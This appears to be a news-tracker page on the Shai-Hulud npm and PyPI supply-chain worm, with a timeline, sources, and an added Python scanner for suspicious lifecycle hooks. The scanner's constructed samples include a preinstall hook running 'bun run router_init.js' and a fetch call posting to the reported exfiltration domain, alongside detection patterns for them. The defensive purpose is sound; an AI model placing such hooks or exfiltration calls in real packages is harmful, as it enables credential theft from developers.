Shai-Hulud npm Worm Expanded Into Cross-Ecosystem Supply Chain Attacks
A supply-chain malware campaign known as Shai-Hulud compromised hundreds of packages in the npm ecosystem and later spread into both npm and PyPI, using stolen maintainer credentials and trusted publishing workflows to push trojanized releases. Early reporting said the worm affected more than 500 npm packages, searched infected developer and CI/CD environments for GitHub Personal Access Tokens, cloud API keys, and other secrets, and exfiltrated them to attacker-controlled infrastructure and public GitHub repositories. GitHub removed hundreds of malicious packages, while CISA urged organizations to review dependencies, check for cached malicious packages, rotate credentials, and enforce phishing-resistant MFA for developer accounts.
Later waves became more aggressive and broader in scope. Researchers said a second campaign hit hundreds more npm packages and had a blast radius exceeding 27,000 repositories, abusing preinstall and other lifecycle hooks to steal secrets, hijack GitHub Actions, self-propagate into additional packages, and in some cases deploy a conditional wiper-like payload. A subsequent Mini Shai-Hulud wave affected more than 170 packages across npm and PyPI, including packages tied to TanStack, Mistral AI, OpenSearch, Guardrails AI, UiPath, and others; it used files such as router_init.js, invoked Bun through malicious package scripts, targeted npm, GitHub, cloud, Kubernetes, Vault, and CI/CD credentials, and demonstrated that provenance and OIDC-based trusted publishing can still be abused when attacker-controlled code runs inside legitimate release workflows.
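The waves described above share two mechanical traits a defender can check for cheaply: malicious commands placed in npm lifecycle hooks (preinstall and similar) that invoke Bun or load a router_init.js file, and files that reference the reported exfiltration domain. The following scanner is an added example, not code from the page or from any of the vendors named in it; the manifests and file contents it scans are constructed for the example, the list of lifecycle hook names is the standard npm set, and the match patterns are taken only from the indicators this page mentions (Bun invocation, router_init.js, filev2.getsession.org). It flags manifests for human review rather than rendering a verdict, since legitimate packages also use postinstall hooks.

```python
"""Flag npm manifests and files that match the Shai-Hulud traits named above.

Added example, not part of the original report. All sample data below is
constructed; patterns come only from indicators named on the page.
"""
from __future__ import annotations

import os
import re

# npm lifecycle hooks that run automatically during install/publish.
LIFECYCLE_HOOKS = {
    "preinstall", "install", "postinstall", "prepare",
    "prepublish", "prepublishOnly", "prepack", "postpack",
}

# Traits reported for the Mini Shai-Hulud wave: Bun invoked from package
# scripts, and a router_init.js loader file.
SUSPICIOUS_SCRIPT_PATTERNS = {
    "bun": re.compile(r"\bbunx?\b"),
    "router_init": re.compile(r"router_init\.js"),
}

# Domain reported by Cynet as an indicator for this wave (from the page).
KNOWN_DOMAINS = ("filev2.getsession.org",)


def scan_manifest(manifest: dict) -> list[dict]:
    """Return one finding per lifecycle hook whose command matches a pattern.

    Non-lifecycle scripts (e.g. "test") are ignored: they only run when a
    developer asks for them, not on `npm install`.
    """
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        matched = [name for name, pat in SUSPICIOUS_SCRIPT_PATTERNS.items()
                   if pat.search(command)]
        if matched:
            findings.append({
                "package": manifest.get("name", "?"),
                "hook": hook,
                "command": command,
                "matched": matched,
            })
    return findings


def scan_file(path: str, text: str) -> list[str]:
    """Flag a file by the reported loader filename and by domain references."""
    findings = []
    if os.path.basename(path) == "router_init.js":
        findings.append("filename router_init.js")
    for domain in KNOWN_DOMAINS:
        if domain in text:
            findings.append(f"references {domain}")
    return findings


# Constructed sample inputs (not real packages).
SAMPLE_MANIFESTS = [
    {"name": "clean-lib",
     "scripts": {"test": "node test.js", "postinstall": "node scripts/verify.js"}},
    {"name": "example-compromised",
     "scripts": {"preinstall": "bun run router_init.js", "test": "node test.js"}},
    {"name": "bun-using-lib",  # uses Bun, but only in a developer-run script
     "scripts": {"test": "bun test", "postinstall": "node -e \"console.log('ok')\""}},
]
SAMPLE_FILES = {
    "node_modules/example-compromised/router_init.js":
        "fetch('https://filev2.getsession.org/upload', {method: 'POST'})",
    "node_modules/clean-lib/index.js": "module.exports = () => 'hello';",
}


def scan_all(manifests, files) -> dict:
    """Run both scanners and collect everything worth a reviewer's attention."""
    report = {"manifests": [], "files": {}}
    for manifest in manifests:
        report["manifests"].extend(scan_manifest(manifest))
    for path, text in files.items():
        hits = scan_file(path, text)
        if hits:
            report["files"][path] = hits
    return report


if __name__ == "__main__":
    for finding in scan_all(SAMPLE_MANIFESTS, SAMPLE_FILES)["manifests"]:
        print("MANIFEST", finding)
    for path, hits in scan_all(SAMPLE_MANIFESTS, SAMPLE_FILES)["files"].items():
        print("FILE", path, hits)
```

In a real review the manifests would come from every package.json under node_modules (and from the lockfile's resolved versions), and the file scan would cover the whole tree; the point of restricting the manifest check to lifecycle hooks is that those are the scripts the install step executes without anyone asking.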

How this story unfolded
13 events from the most recent confirmed update back to the earliest known activity.
Cynet publishes technical analysis and IOCs for Mini Shai-Hulud
Cynet released a detailed analysis of the latest Mini Shai-Hulud wave, describing JavaScript and Python variants, affected packages, and indicators including malicious hashes and the domain filev2.getsession.org. The report highlighted worm-like propagation, CI/CD targeting, and links to AI-assisted development workflows.
Aikido reports Mini Shai-Hulud expansion hitting 169 npm packages
Aikido reported that Mini Shai-Hulud had expanded into a broader npm compromise affecting 373 malicious package-version entries across 169 package names, including TanStack and Mistral-related packages. The report described credential theft, GitHub workflow abuse, and trusted publishing abuse via OIDC-minted npm tokens.
Mini Shai-Hulud campaign discovered across npm and PyPI
A new wave of the Shai-Hulud supply-chain campaign was discovered affecting both npm and PyPI, with more than 170 packages reportedly compromised. The malware targeted developer machines, CI/CD runners, and build systems to steal credentials and propagate through legitimate publishing workflows.
ZDI publicly discloses disputed npm and Discord issues
ZDI published its blog post detailing the disclosure timelines and technical dispute over two Windows-related module resolution and local attack issues involving npm CLI and Discord. The publication framed both as zero-day advisories after the vendors declined to treat them as security vulnerabilities.
ZDI tells Discord it will publish 0-day advisory
Following additional discussions in December 2025, ZDI notified Discord of its intent to publish a zero-day advisory for the disputed issue. Discord had maintained that the reported behavior was out of scope because it involved local attacks.
ZDI tells npm vendor it will publish 0-day advisory
After urging reassessment of the npm CLI issue, ZDI informed the vendor of its intent to publish a zero-day advisory. This followed the vendor's earlier position that the behavior was not a security vulnerability.
Researchers report broad impact from Shai-Hulud 2.0
Researchers said the second wave affected more than 27,000 repositories across about 350 users and included packages linked to organizations such as Zapier, ENS Domains, PostHog, and Postman. They also noted more aggressive capabilities including cross-victim exfiltration, self-healing, Linux privilege escalation, and a conditional destructive payload.
Second Shai-Hulud wave compromises npm packages
A second major campaign, dubbed Sha1-Hulud or Shai-Hulud 2.0, compromised hundreds of npm packages uploaded between November 21 and 23, 2025. Researchers said it abused compromised maintainer accounts and used preinstall execution to steal secrets and spread further.
CISA urges dependency reviews after Shai-Hulud attack
CISA warned organizations to monitor for malicious dependencies and cached packages following the npm ecosystem compromise. The agency recommended credential rotation, dependency checks, and phishing-resistant MFA for developer accounts.
GitHub removes malicious npm packages tied to Shai-Hulud
In response to the Shai-Hulud campaign, GitHub said it removed more than 500 packages from npm and blocked new packages containing the malware's indicators of compromise. This was part of mitigation efforts to contain the supply-chain attack.
Shai-Hulud compromises 500+ npm packages
A major npm supply-chain attack tracked as Shai-Hulud compromised more than 500 packages. The malware stole credentials such as GitHub personal access tokens and cloud API keys and exfiltrated them to attacker-controlled infrastructure and a public repository.
ZDI reports Discord local attack issue to vendor
ZDI notified Discord of a security issue involving behavior the company later classified as out of scope because it required local access. This began the disclosure process for the second disputed case described in the report.
ZDI reports npm CLI module-resolution issue to vendor
ZDI submitted a report about dangerous module resolution behavior involving npm CLI on Windows. The vendor acknowledged the report the same day and responded that the behavior was by design rather than a security issue.
Sources
6 references tracked.
Mini Shai-Hulud: Supply Chain Compromise in the Age of AI-Driven Development (Cynet, cynet.com)
Mini Shai-Hulud Is Back: npm Worm Hits over 160 Packages, including Mistral and Tanstack (aikido.dev)
Zero Day Initiative - Node.js Trust Falls: Dangerous Module Resolution on Windows (thezdi.com)
Zero Day Initiative - Node.js Trust Falls: Dangerous Module Resolution on Windows (zerodayinitiative.com)
Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft (thehackernews.com)
CISA urges dependency checks following Shai-Hulud compromise (Cybersecurity Dive, cybersecuritydive.com)